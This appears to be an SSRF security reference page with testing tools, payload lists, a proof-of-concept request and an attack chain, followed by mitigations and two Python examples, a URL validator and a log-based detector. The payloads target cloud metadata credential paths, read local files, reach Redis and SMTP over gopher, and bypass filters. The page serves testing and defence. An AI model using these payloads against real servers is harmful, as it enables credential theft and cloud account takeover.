Critical Severity | OWASP A10:2021
Server-Side Request Forgery (SSRF)
Description
What is SSRF?
Server-Side Request Forgery (SSRF) allows an attacker to make the server perform requests on their behalf. Unlike CSRF (which tricks a victim's browser into performing actions), SSRF involves the vulnerable server itself making requests to internal services or external systems.
SSRF allows attackers to:
- Access internal services (localhost, private networks)
- Exploit cloud metadata services (AWS, GCP, Azure)
- Port scan internal infrastructure
- Read internal files via file:// protocol
- Attack internal services (Redis, MongoDB, etc.)
- Bypass firewall restrictions
Classification
- Vulnerability Type: Server-Side Request Forgery (CWE-918)
- OWASP: A10:2021 - Server-Side Request Forgery
- Attack Types:
- Basic SSRF - Response visible to attacker
- Blind SSRF - No response, only side effects
- Semi-blind SSRF - Limited response data
Attack Surface
- URL Parameters: preview, url, src, dest, redirect, uri, path
- API Endpoints: /fetch, /load, /get, /render
- File Processing: PDF generation, image processing
- Webhooks: Callback URLs, notification URLs
- Proxy Services: URL shorteners, proxy gateways
- API Integrations: Social media, payment callbacks
Preconditions
- Application fetches URLs based on user input
- No proper validation of the URL target
- Server can make outbound connections
- No allowlist or proper restrictions on URL schemes
Detection
Basic Payloads for Testing:
http://localhost/
http://127.0.0.1/
http://169.254.169.254/ (AWS metadata)
Tools:
- Burp Suite: Manual testing with Intruder
- SSRFmap: Automated SSRF testing
- groundsel: SSRF fuzzer
Burp Suite Workflow
- Identify URL-fetching functionality
- Send request to Repeater
- Replace URL with internal targets
- Check response for data leakage
- If blind, use out-of-band detection
- Escalate to cloud metadata or internal services
Tool Automation
- SSRFmap: Automatic SSRF exploitation
- Burp Suite: Manual testing
- Gitscan: GitHub SSRF scanner
# SSRFmap
python ssrfmap.py -r request.txt -p url
# nuclei
nuclei -u "http://target.com" -t templates/ssrf.yaml
Basic Payloads
Internal Access
http://localhost/
http://127.0.0.1/
http://0.0.0.0/
http://[::1]/
Cloud Metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/metadata/v1/
Advanced Payloads
AWS Payloads
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/dynamic/instance-identity/document
File Protocol
file:///etc/passwd
file:///var/www/html/config.php
file:///proc/self/environ
Protocol Smuggling
dict://localhost:11211/stats
gopher://127.0.0.1:6379/_INFO
sftp://localhost:22/
AI-Generated Payloads
AWS Lambda: http://169.254.169.254/2018-06-01/runtime/invocation/
Kubernetes: http://kubernetes.default.svc/
Context-Aware Payloads
WAF Bypass
http://127.1/
http://127.127.127.127/
http://2130706433/ (Decimal)
http://[::ffff:127.0.0.1]/
Proof of Concept
# Target: https://target.com/url?url=https://example.com
# Payload: https://target.com/url?url=http://169.254.169.254/latest/meta-data/
# Response reveals AWS credentials!
Request / Response
GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: target.com

HTTP/1.1 200 OK

ami-id
instance-id
instance-type
...
Impact Analysis
Severity: CRITICAL (CVSS 10.0)
- Full cloud account compromise via metadata
- Access to internal services and databases
- Port scanning and network mapping
- Remote code execution in many cases
Advanced Exploitation
1. Gopher Protocol for Redis:
gopher://127.0.0.1:6379/_CONFIG GET *
2. SMTP via Gopher:
gopher://127.0.0.1:25/_MAIL FROM:<attacker@attacker.com>
Attack Chains
Chain 1: SSRF to Cloud Takeover
- Find URL-fetching parameter
- Access AWS metadata service
- Steal IAM credentials
- Create new IAM user with admin access
Test Cases
| ID | Test | Payload | Expected |
|---|---|---|---|
| 1 | Localhost | http://127.0.0.1 | Internal response |
| 2 | AWS Metadata | http://169.254.169.254/... | AWS data |
| 3 | File Read | file:///etc/passwd | File content |
Mitigation
- URL Validation: Use allowlist for URLs
- Disable Unnecessary Protocols: Disable file://, gopher://, etc.
- Cloud Metadata Protection: Disable metadata API from instance
- Network Segmentation: Limit outbound access from server
Advanced Mitigation
# AWS - Disable IMDS
aws ec2 modify-instance-metadata-options \
--instance-id i-1234567890abcdef0 \
--http-endpoint disabled
Use URL parsing libraries to validate each URL component (scheme, userinfo, host, port), enforce request timeouts, and log and monitor all outgoing requests.
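The allowlist and component validation described above, as an added example in Python (written for this page, not code from the page's author or any project). It parses the URL with the standard library, rejects non-HTTP schemes and userinfo, normalises the obfuscated host forms listed under WAF Bypass ("127.1", decimal, IPv4-mapped IPv6), resolves names and refuses anything that maps to a non-public address, which is what blocks the 169.254.169.254 metadata range. The function names, the `FAKE_DNS` table and the example.com address are constructed assumptions so the demo runs offline; `system_resolver` is the default for real use.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def literal_to_ip(host):
    """Turn a host literal into an IP object, or None if it is a DNS name.

    Handles the obfuscated forms from the bypass list: dotted shorthand
    ("127.1"), a bare decimal ("2130706433"), and IPv4-mapped IPv6
    ("::ffff:127.0.0.1"), which is unwrapped to the IPv4 address it hides.
    """
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        try:
            # inet_aton is the permissive BSD parser many HTTP clients use,
            # so "127.1" and "2130706433" both come back as 127.0.0.1.
            addr = ipaddress.IPv4Address(socket.inet_aton(host))
        except OSError:
            return None
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr


def system_resolver(host):
    """Default resolver: every address the OS returns for host."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def check_outbound_url(url, allowed_hosts=None, resolver=system_resolver):
    """Decide whether the server may fetch url on a user's behalf.

    Returns (ok, reason, pinned_ip). When ok is True the HTTP client should
    connect to pinned_ip (keeping the original name in Host/SNI) instead of
    resolving the name a second time, so a changed DNS answer between this
    check and the connect (DNS rebinding) cannot redirect the request.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", None
    if parts.username is not None or parts.password is not None:
        # "localhost.@example.com": userinfo confuses hand-rolled parsers
        return False, "userinfo in URL not allowed", None
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "missing host", None
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, f"host {host!r} not in allowlist", None

    literal = literal_to_ip(host)
    if literal is not None:
        candidates = [literal]
    else:
        resolved = (literal_to_ip(x) for x in resolver(host))
        candidates = [a for a in resolved if a is not None]
    if not candidates:
        return False, f"host {host!r} did not resolve", None
    for addr in candidates:
        # is_global is False for loopback, RFC 1918, link-local (169.254/16,
        # where cloud metadata lives), 0.0.0.0/8, CGNAT and other special ranges.
        if not addr.is_global:
            return False, f"host {host!r} maps to non-public address {addr}", None
    return True, "ok", str(candidates[0])


# Constructed resolver table so the demo runs offline; the example.com
# address below is a placeholder, not a claim about real DNS.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "metadata.google.internal": ["169.254.169.254"],
    "localhost": ["127.0.0.1", "::1"],
}


def fake_resolver(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for candidate in [
        "https://example.com/page",
        "http://169.254.169.254/latest/meta-data/",
        "http://metadata.google.internal/computeMetadata/v1/",
        "http://127.1/",
        "http://2130706433/",
        "http://[::ffff:127.0.0.1]/",
        "file:///etc/passwd",
        "gopher://127.0.0.1:6379/_INFO",
        "http://localhost.@example.com/",
    ]:
        ok, why, ip = check_outbound_url(candidate, {"example.com"}, fake_resolver)
        print(f"{('ALLOW' if ok else 'BLOCK'):5} {candidate:55} {why}")
```

Two design points matter in practice: the check must be applied again on every redirect hop (a public URL that 302s to the metadata address is a classic bypass), and the connection must go to the pinned address rather than re-resolving the name, otherwise a rebinding DNS answer defeats the check. Most HTTP client libraries need a custom transport or adapter to pin the address; that wiring is outside this example.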
Monitoring & Detection
- Alert on requests to 169.254.169.254 (metadata)
- Monitor for internal IP addresses in requests
- Log all URL-fetching operations
- Alert on unusual outbound connections
Security Controls
| Control | Implementation |
|---|---|
| Allowlist | Only allow specific domains |
| Protocol Restriction | Disable file://, gopher:// |
| Cloud Hardening | Disable metadata API |
| Network Controls | Restrict outbound traffic |
Bypass Techniques
http://127.1/ (Short form)
http://2130706433/ (Decimal)
http://[::1]/ (IPv6)
localhost.@domain.com (DNS hijacking)
Tools & Commands
- SSRFmap: ssrfmap -r request.txt
- Burp Collaborator: Out-of-band detection
Retest Steps
| Step | Action |
|---|---|
| 1 | Implement allowlist |
| 2 | Re-test with localhost |
| 3 | Re-test with cloud metadata |
| 4 | Disable metadata API |
Detection Logic
- Static: Check for URL-fetching without validation
- Dynamic: Fuzz URL parameters with internal targets
Threat-Hunting Notes
IOCs: Requests to 169.254.x.x, file:// protocol, internal IPs
Defensive Detection Ideas
Deploy WAF with SSRF rules, implement network monitoring for unusual outbound connections.
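The monitoring rules from the Monitoring & Detection list and the IOCs in the Threat-Hunting Notes (requests to 169.254.x.x, file:// URLs, internal IPs, unusual outbound fan-out), implemented as an added example in Python over an application's outbound-fetch log. This is written for this page, not code from the page's author or any tool; the log format, the sample lines and the per-user scan threshold are constructed assumptions. It normalises the short and decimal host forms from the Bypass Techniques list so they are not missed, and it escalates when one user reaches several distinct internal targets, the pattern port scanning through an SSRF produces.

```python
import ipaddress
import re
import socket
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample of an application's outbound-fetch log, one line per
# server-side request; the field layout is an assumption for this example.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=10.0.3.11 user=alice url=https://images.example.com/a.png status=200
2024-05-01T10:00:07Z src=10.0.3.11 user=bob url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ status=200
2024-05-01T10:00:09Z src=10.0.3.11 user=bob url=http://127.1:6379/ status=502
2024-05-01T10:00:10Z src=10.0.3.11 user=bob url=http://2130706433:22/ status=502
2024-05-01T10:00:11Z src=10.0.3.11 user=bob url=http://10.0.0.5:8080/ status=200
2024-05-01T10:00:12Z src=10.0.3.11 user=bob url=file:///etc/passwd status=200
2024-05-01T10:00:15Z src=10.0.3.11 user=bob url=gopher://127.0.0.1:6379/_INFO status=200
2024-05-01T10:00:20Z src=10.0.3.11 user=carol url=https://cdn.example.com/b.png status=200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) url=(?P<url>\S+) status=(?P<status>\d+)$"
)
# Schemes a URL-preview/fetch feature has no business using (file://, gopher://
# and dict:// are the ones listed under Protocol Smuggling and File Protocol).
RISKY_SCHEMES = {"file", "gopher", "dict", "ftp", "sftp", "ldap"}
# Metadata endpoints named on this page (AWS, GCP, Kubernetes API).
METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal", "kubernetes.default.svc"}


def host_to_ip(host):
    """Literal host -> IP object (also "127.1" and decimal forms), else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        try:
            return ipaddress.IPv4Address(socket.inet_aton(host))
        except OSError:
            return None


def classify_url(url):
    """Return the set of reasons a fetched URL looks like SSRF abuse (empty = clean)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower().rstrip(".")
    reasons = set()
    if scheme in RISKY_SCHEMES:
        reasons.add(f"scheme:{scheme}")
    if host in METADATA_HOSTS:
        reasons.add("cloud-metadata")
    addr = host_to_ip(host)
    if addr is not None:
        if addr.is_loopback:
            reasons.add("loopback")
        elif addr.is_link_local:          # 169.254.0.0/16, the metadata range
            reasons.add("link-local")
        elif addr.is_private:             # RFC 1918, 0.0.0.0/8, ULA ...
            reasons.add("private-net")
    return reasons


def analyze(log_text, scan_threshold=3):
    """Return (findings, alerts): flagged lines, plus the alerts they add up to."""
    findings, targets_by_user = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline should count these too
        reasons = classify_url(m["url"])
        if reasons:
            findings.append({**m.groupdict(), "reasons": sorted(reasons)})
            targets_by_user[m["user"]].add(urlsplit(m["url"]).netloc or m["url"])
    alerts = [
        f"CRITICAL user={f['user']} fetched cloud metadata: {f['url']}"
        for f in findings if "cloud-metadata" in f["reasons"]
    ]
    # Many distinct internal targets from one user in a short window reads as
    # port scanning / network mapping through the SSRF rather than one-off abuse.
    for user, targets in targets_by_user.items():
        if len(targets) >= scan_threshold:
            alerts.append(f"HIGH user={user} reached {len(targets)} internal targets (possible port scan)")
    return findings, alerts


if __name__ == "__main__":
    found, raised = analyze(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} user={f['user']:6} {','.join(f['reasons']):22} {f['url']}")
    for a in raised:
        print(a)
```

The same classification applies to egress-proxy or VPC flow logs, where the destination is already an IP and the hostname step is unnecessary; the valuable signal there is any connection from an application tier to 169.254.169.254 or to loopback ports such as 6379, which a web front end should never need.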